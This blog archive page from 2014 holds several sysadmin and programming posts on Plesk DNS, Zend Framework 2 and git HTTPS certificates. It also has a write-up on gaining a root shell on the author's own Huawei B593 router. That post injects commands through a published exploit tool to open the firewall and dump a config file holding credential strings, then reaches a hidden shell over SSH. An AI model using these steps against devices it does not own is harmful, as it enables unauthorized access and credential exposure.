Parallels Plesk Panel: Disabling DNS for a domain
Tuesday, January 28. 2014
Parallels has "improved" their support-policy. Now you need support contract or pre-purchased incidents just to report a bug. Because my issue is not on my own box (where I have support), but on a customer's server, there is nobody left for me to complain about this. So, here goes:
For some reason on Parallels Plesk Panel 11.5.30 Update #30 (which is the latest version at the time of writing this) a single and every time the same domain creates a DNS-zone into /etc/bind.conf. That would be fully understandable, if that particular domain would have the DNS enabled. It doesn't. The web-GUI clearly indicates the DNS-service for the domain as switched off.
I did investigate this and found that couple of commands will temporarily fix the issue:
/usr/local/psa/bin/dns --off -the-domain-
/usr/local/psa/admin/sbin/dnsmng --remove -the-domain-
The first command will hit the DNS with a big hammer to make sure it is turned off. The second command will polish the leftovers from the /etc/bind.conf and properly notify BIND about configuration change. The problem is, that the zone will keep popping back. I don't know what exactly makes it re-appear, but it has done so couple of times for me. That is really, really annoying.
Parallels: You're welcome. Fix this for the next release, ok?
Rest of you: Hopefully this helps. I had a nice while debugging really misguided DNS-queries just to figure out a zone has DNS enabled.
Linux Integration Services for Hyper-V 3.5: Network status still degraded
Friday, January 24. 2014
Microsoft announced version 3.5 of Linux Integration Services for Hyper-V. An ISO-image is available for download at Mirosoft's site.
In one of my earlier articles I was wondering if it really matters when Hyper-V indicates the Linux guest status as degraded and tells that an upgrade is required. This version does not change that. Looks like they just added some (weird) new features and improved set of virtulization features for Windows Server 2012 R2, but didn't touch the network code. However, there is a promise of TRIM-support for 2012 R2.
So, the bottom line is: not worth upgrading.
Speedtest.net from Linux CLI
Monday, January 20. 2014
Speedtest.net has pretty much gained The-place-to-test-your-connection-speed -status. It's like Google for doing web searches. There simply is no real competition available.
Mr. Matt Martz (while throwing hot coals) did study their JavaScript-code enough to write their client-API with Python.
The installation into proper directory (recommended: /usr/local/bin/) with proper permissions is this simple:
wget -O speedtest-cli \ https://raw.github.com/sivel/speedtest-cli/master/speedtest_cli.py chmod +x speedtest-cli
The built-in automatic detection of nearest server does not work for me very well. Their recommended nearest server is not in the country I live (Finland), but on Russian side. The network connections over their border aren't that good and it simply does not yield reliable measurements. Not to worry, the CLI-version can do following:
speedtest_cli --list | fgrep Finland
864) Nebula Oy (Helsinki, Finland) [204.35 km]
Now that we know the server ID of a proper point, we can do:
speedtest_cli --server 864
It will yield:
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
Testing from Finland Oyj (80.80.80.80)...
Hosted by Nebula Oy (Helsinki) [204.35 km]: 14.782 ms
Testing download speed........................................
Download: 92.69 Mbit/s
Testing upload speed..................................................
Upload: 4.32 Mbit/s
Nice!
Again, thanks Matt for sharing your work with all of us.
Huawei B593: Logging into shell [Solved!]
Friday, January 17. 2014
I finally cracked this! Just to clarify, I'm running an u-12 model with the Danish 3 firmware.
Using the ping-exploit to loosen firewall rules
The first thing to is open the firewall to allow local access to the box. In my article about DMZ-setting I already established, that all the good ports are blocked by IPtables in the Linux. So, the previously published exploit is needed (I'm doing this on my Linux PC):
./B593cmd.pl -the-IP- -the-admin-Pwd- "iptables -I INPUT -i br0 -j ACCEPT"
Now all ports are open from the LAN, but there are no changes to the Internet side. We confirm this by running nmap:
Nmap scan report for -the-IP-
Host is up (0.0082s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
443/tcp open https
631/tcp open ipp
8081/tcp open blackice-icecap
MAC Address: F8:3D:FF:F8:3D:FF (Huawei Technologies Co.)
That is something that I have been able to do earlier, but could not gain anything concrete out of it.
Confirm that you know the CLI-password
Now that we can run any commands to the box, let's confirm the configuration:
./B593cmd.pl -the-IP- -the-admin-Pwd- "cat /var/curcfg.xml" | less
The output is a very long XML-file. The good parts are:
<UserInterface>
<X_Web Timeout="5">
<HttpUpg UpdateURL="update-westerneurope.huaweidevice.com" UpdatePort="80"
CheckNewVer="/westerneurope"/>
<UserInfo NumberOfInstances="2">
<UserInfoInstance InstanceID="1" Username="admin" Userpassword="HoHSyzm0ye4="
IsChanged="1"/>
<UserInfoInstance InstanceID="2" Username="user" Userpassword="2n+mVpCOAaY=" IsChanged="0"/>
</UserInfo>
</X_Web>
<X_Cli>
<UserInfo NumberOfInstances="2">
<UserInfoInstance InstanceID="1" Username="admin" Userpassword="f5338SA1kb4=" Userlevel="0"/>
<UserInfoInstance InstanceID="2" Username="user" Userpassword="2n+mVpCOAaY=" Userlevel="1"/>
</UserInfo>
</X_Cli>
</UserInterface>
The output clearly says, that web-GUI and telnet/SSH command line interface have separate user accounts for them. However, the passwords are encrypted. I have been able to determine, that it is a BASE64-encoded string and the binary format increases in 64-bit blocks. The only conclusion is to assume, that the passwords are encrypted with a symmetrical block cipher, but the encryption key, cipher mode of operation and possible initialization vector are currently unknown.
Luckily I know what f5338SA1kb4= and 2n+mVpCOAaY= stand for. They are the default passwords to the box anyway and the manual says that default admin password is admin and default user password is user. Logical, huh? If you don't know the password for CLI-admin, there is no way that you're getting in.
Trying out the SSH
Now, what can we do with the fact, that SSH is now open and we know the password for privileged admin-user? A SSH-login, when using the correct CLI-password will yield:
# ssh admin@-the-IP-
admin@-the-IP-'s password:
Write failed: Broken pipe
Not cool. In my exploit-tool -article, I referred to Mr. Ronkainen's work at http://blog.asiantuntijakaveri.fi/. He said to execute a specific command via SSH. My next attempt is to follow his instruction:
# ssh admin@-the-IP- /bin/sh
admin@-the-IP-'s password:
-------------------------------
-----Welcome to ATP Cli------
-------------------------------
ATP>
WHOOO!!
Now the hidden shell-command will work:
-------------------------------
-----Welcome to ATP Cli------
-------------------------------
ATP>shell
shell
BusyBox vv1.9.1 (2012-11-20 16:01:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#
Nice!
SSH with non-privileged user / Telnet
To test this further, I attempted to login with user user. The non-privileged user does not have the hidden shell-command available and no access will be granted:
# ssh user@-the-IP- /bin/sh
user@-the-IP-'s password:
-------------------------------
-----Welcome to ATP Cli------
-------------------------------
ATP>shell
shell
Command failed.
Also trying to access the ATP Cli via telnet does not work:
# telnet -the-IP-
Trying -the-IP-...
Connected to -the-IP-.
Escape character is '^]'.
-------------------------------
-----Welcome to ATP Cli------
-------------------------------
Login: admin
Password:
Login incorrect. Try again.
I don't know if the telnet is disconnected completely, or is there yet another set of accounts, but web-GUI nor CLI user credentials won't work there.
Future ventures
Anyway. Now that I have the shell-access I have a much better possibility of doing more mischief.
I need to explore the config system more as it would be very very nice to have the firewall allow SSH on boot. Now the only way to allow SSH is to use the exploit and leverage the IPtables. Also on public request, I'm going to implement QoS.
Stay tuned for more B593 hacking!
Zend Framework 2: Touching headLink() twice on layout template
Friday, January 17. 2014
This one was one of the tricky ones. My CSS-inclusion was doubled for a very strange reason. My layout-template has:
{$this->headLink()
->prependStylesheet('/css/style.css')
->prependStylesheet('/css/jQuery/jquery.mobile.css')}
{$this->headLink([
'rel' => 'shortcut icon',
'type' => 'image/vnd.microsoft.icon',
'href' => '/images/favicon.ico'
])}
That would be pretty standard for any web application. Link a couple of CSS-definition files and declare the URL for favorite icon of the website. However, on ZF2 doing things like my above code does, makes things go bad. Rather surprisingly, the HTML gets rendered as:
<link href="/css/jQuery/jquery.mobile.css" media="screen" rel="stylesheet" type="text/css">
<link href="/css/style.css" media="screen" rel="stylesheet" type="text/css">
<link href="/css/jQuery/jquery.mobile.css" media="screen" rel="stylesheet" type="text/css">
<link href="/css/style.css" media="screen" rel="stylesheet" type="text/css">
<link href="/images/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon">
It doesn't actually break anything to have the CSS linked twice, but it just makes the CSS-debugging bit weird. Lot of the declarations are twice in the list and browser has to determine which ones are effective and which ones are ignored in any particular case.
To find out what's going on, I swapped my template to contain:
{$this->headLink([
'rel' => 'shortcut icon',
'type' => 'image/vnd.microsoft.icon',
'href' => '/images/favicon.ico'
])}
{$this->headLink()
->prependStylesheet('/css/style.css')
->prependStylesheet('/css/jQuery/jquery.mobile.css')}
Whatta ... hell!? Now everything works as expected. First the favicon-link and then CSS-links. Without any unnecessary doubling.
After a nice long morning of debugging ZF2-view code revealed a solution:
{$this->headLink()
->prependStylesheet('/css/style.css')
->prependStylesheet('/css/jQuery/jquery.mobile.css')}
{$this->headLink()
->deleteContainer()}
{$this->headLink([
'rel' => 'shortcut icon',
'type' => 'image/vnd.microsoft.icon',
'href' => '/images/favicon.ico'
])}
Now everything renders nicely. No doubles, all in the order I wanted them to be. The key was to erase Zend\View\Helper\HeadLink's container after doing the stylesheets. The method is actually in the class Zend\View\Helper\Placeholder\Container\AbstractStandalone. Apparently headLink's container only adds up and any subsequent calls simply add to the existing storage. The mistake is to print the contents of the container in the middle. The final solution is not to touch headLink() twice:
{$this->headLink([
'rel' => 'shortcut icon',
'type' => 'image/vnd.microsoft.icon',
'href' => '/images/favicon.ico'
])
->prependStylesheet("/css/style.css")
->prependStylesheet("/css/jQuery/jquery.mobile.css")}
Now it works much better! The rendered HTML will have the items in appropriate order:
- /css/jQuery/jquery.mobile.css
- /css/style.css
- /images/favicon.ico
This was yet again one of the funny things that have changed since ZF1. I definitely would consider that as a bug, but don't want to bother sending Zend a report out of it. They'll yet again pull a Microsoft and declare it as a feature.
Zend Framework 2: preDispatch(), returning properly without executing action
Thursday, January 16. 2014
Getting ZF2 to do preDispatch() and postDispatch() like ZF1 had is widely known and documented. In your controller, add this:
protected function attachDefaultListeners()
{
parent::attachDefaultListeners();
$event_mgr = $this->getEventManager();
$event_mgr->attach('dispatch', array($this, 'preDispatch'), 100);
$event_mgr->attach('dispatch', array($this, 'postDispatch'), -100);
}
Two simple listeners are attached with proper priorities to trigger before and after the action.
However, to go somewhere else before the action is executed adds some complexity, as one can expect. In preDispatch() you can do one of two suggested things. A redirect:
// Do a HTTP/302 redirect
return $this->redirect()->toRoute(
'application', array('controller' => 'index', 'action' => 'index'
));
My issue here is, that it literally does a HTTP/302 redirect in your browser. Another problem is, that it still executes the action it was targeted to. It renders the view, runs all the listeners, does all the plugins and helpers as it started to do. It just redirects after all that. I don't want my user to do a redirect or to run all the bells and whistles including the action. Why cannot I simply return something else instead, like ZF1 could be programmed to do. On my top-1 list is to execute an action from another controller?
So, the another option to do is to simply call it quits right in the middle of preDispatch():
$url = $event->getRouter()
->assemble(
array('action' => 'index'),
array('name' => 'frontend')
);
$response = $event->getResponse();
$response->getHeaders()->addHeaderLine('Location', $url);
$response->setStatusCode(302);
$response->sendHeaders();
exit();
That's pretty much the same as previous, but uglier. exit()!! Really? In Zend Framework?! I'd rather keep the wheels rolling and machine turning like it normally would do until it has done all the dirty deeds it wants to do. Poking around The Net reveals, that nobody is really offering anything else. Apparently everybody simply are doing a copy/paste from the same sites I found.
This is what I offer. Discard the current operation, start a new one and return that! A lot better alternative.
Example 1, return JSON-data:
$event->stopPropagation(true);
// Skip executing the action requested. Return this instead.
$result = new JsonModel(array(
'success' => false,
'loginrequired' => true
));
$result->setTerminal(true);
$event->setResponse(new Response());
$event->setViewModel($result);
The key is in the setResponse()-call.
Example 2, call another action:
$event->stopPropagation(true);
// Skip executing the action requested.
// Execute anotherController::errorAction() instead.
$event->setResponse(new Response());
$result = $this->forward()->dispatch('Another', array(
'action' => 'error'
));
$result->setTerminal(true);
$event->setViewModel($result);
Hope this helps somebody else trying to do a ZF1 to ZF2 transition. In the end, there is only one thing similar between them. Their name has Zend Framwork in it.
git and HTTPS (fatal: HTTP request failed)
Friday, January 10. 2014
Two facts first about git:
- A number of sites tells you to use git:// or ssh:// instead of https://. Apparently there is some unnecessary complexity when piggy-backing over HTTP-secure.
- I personally don't like git due to it's complexity. Its like a requirement of being an experienced mechanic before getting a driver's license. You can drive a car without exact technical knowledge about the inner workings of a car. But that seems to be the only way to go with git.
So, I choose to run my own repo on my own box and do it over HTTPS. Since HTTPS is a 2nd class protocol in the git-world many simple things are unnecessarily difficult.
My initial attempt was to do a simple clone from my existing repo:
git clone https://me@my.server/my/Project
Well, that doesn't end well. There is this fully explanatory fatal: HTTP request failed -error. Adding --verbose does not help. Then I found a fact that git uses curl as it's HTTPS-transport client and very helpful environment variable to diagnose the problem:
export GIT_CURL_VERBOSE=1
git clone https://me@my.server/my/Project
That way I got the required debug-information about Certificate Authority -certificates being used. It didn't use my own CA's file at all.
The next fix was to tweak the configuration:
git config --global http.sslverify false
It made my clone working! That, however, is not the way I do computer security. I need my certificates verified. From git-config(1) man-page I found the required piece of information. Adding the CA-root path of my Linux-distro makes the entire thing working:
git config --global http.sslverify true
git config --global http.sslCAPath /etc/pki/tls/certs
Finally I found the good site about all this: http://stackoverflow.com/questions/3777075/ssl-certificate-rejected-trying-to-access-github-over-https-behind-firewall/4454754 It seems to contain all this information.
Unfortunately too late! But wouldn't it be great for git to emit the proper error message about the "Peer's certificate issuer is not recognized"? That was the original problem to begin with. Also, why don't CentOS-people configure their curl-library to behave like OpenSSL does?